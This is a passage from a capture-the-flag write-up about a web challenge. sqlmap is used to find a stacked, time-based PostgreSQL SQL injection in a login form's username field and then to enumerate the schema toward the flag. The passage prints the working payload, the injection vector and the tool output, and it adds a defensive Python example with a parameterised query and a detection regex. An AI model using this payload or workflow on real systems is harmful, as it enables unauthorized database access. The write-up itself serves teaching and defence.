But that did not turn up anything interesting, contrary to my expectations. I looked around the source for any hints but didn't find anything, not even a single JS file; the rest of the code and the CSS files had nothing of value. So, after a hint from the Discord channel, it was time to expand on the same issue that got me admin in the first place: extending the auth bypass to SQLi. I let sqlmap loose to see if it would work, and it did. Passing the login request to sqlmap as a text file did the job.
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:30:22 /2020-03-07/
[11:30:22] [INFO] parsing HTTP request from 'req1.txt'
[11:30:22] [DEBUG] not a valid WebScarab log data
[11:30:22] [DEBUG] cleaning up configuration parameters
[11:30:22] [DEBUG] setting the HTTP timeout
[11:30:22] [DEBUG] setting the HTTP User-Agent header
[11:30:22] [DEBUG] creating HTTP requests opener object
[11:30:22] [DEBUG] resolving hostname 'web2.utctf.live'
[11:30:22] [INFO] testing connection to the target URL
[11:30:22] [DEBUG] declared web page charset 'utf-8'
[11:30:22] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:30:22] [INFO] testing if the target URL content is stable
[11:30:23] [INFO] target URL content is stable
[11:30:23] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[11:30:23] [INFO] testing for SQL injection on POST parameter 'username'
[11:30:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:31:20] [INFO] checking if the injection point on POST parameter 'username' is a false positive
[11:31:31] [DEBUG] checking for filtered characters
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 92 HTTP(s) requests:
---
Parameter: username (POST)
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: username=admin';SELECT PG_SLEEP(5)--&pass=asd
    Vector: ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)--
---
[11:33:18] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[11:33:18] [INFO] fetched data logged to text files under '/root/.sqlmap/output/web2.utctf.live'
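To make the finding above concrete from the defender's side, here is an added example (my own code, not the challenge's source or sqlmap's): it shows what the reported payload does to a login query built by string concatenation, the parameterised form that neutralises it, and a small check a log or WAF reviewer can run over the POST field. The users table, the column names `username`/`pass` and the `looks_like_stacked_time_based` helper are assumptions; the challenge's real schema is not known.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed sample users table standing in for the challenge's (unknown) schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pass TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'hunter2')")
    return conn

def build_query_unsafe(username, password):
    """The weak pattern: the POST fields are spliced straight into the SQL text.
    With the payload sqlmap reported, the result is two statements and a trailing
    comment; PostgreSQL drivers such as psycopg2 execute a multi-statement string
    as-is, which is the 'stacked queries' behaviour shown in the sqlmap output."""
    return (f"SELECT username FROM users WHERE username='{username}' "
            f"AND pass='{password}'")

def login_safe(conn, username, password):
    """Parameterised form: the value is bound as data and never parsed as SQL,
    so the payload is simply an unknown username and no row comes back."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND pass=?",
        (username, password),
    ).fetchone()
    return row is not None

# Review check for access logs or a WAF rule: after URL-decoding the field,
# look for ';' opening a new statement followed by a SELECT that calls pg_sleep().
# (Assumed helper name; it is not part of the original post.)
STACKED_SLEEP = re.compile(r";\s*select\b.*?\bpg_sleep\s*\(", re.IGNORECASE | re.DOTALL)

def looks_like_stacked_time_based(field_value):
    return STACKED_SLEEP.search(unquote_plus(field_value)) is not None

if __name__ == "__main__":
    payload = "admin';SELECT PG_SLEEP(5)--"   # the username value from the sqlmap output
    print(build_query_unsafe(payload, "asd"))
    conn = make_db()
    print(login_safe(conn, payload, "asd"))         # False
    print(login_safe(conn, "admin", "hunter2"))     # True
    print(looks_like_stacked_time_based(payload))   # True
```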
As we can see, sqlmap returned the injected query and identified PostgreSQL as the backend database: a blind SQLi with stacked queries. So I continued with sqlmap to retrieve the current DB name with the command below.
[11:34:24] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[11:34:35] [INFO] adjusting time delay to 1 second due to good response times
public
[11:34:59] [DEBUG] performed 46 queries in 53.31 seconds
[11:34:59] [WARNING] on PostgreSQL you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on PostgreSQL): 'public'
And then I retrieved the entire public DB as follows, which gave us the flag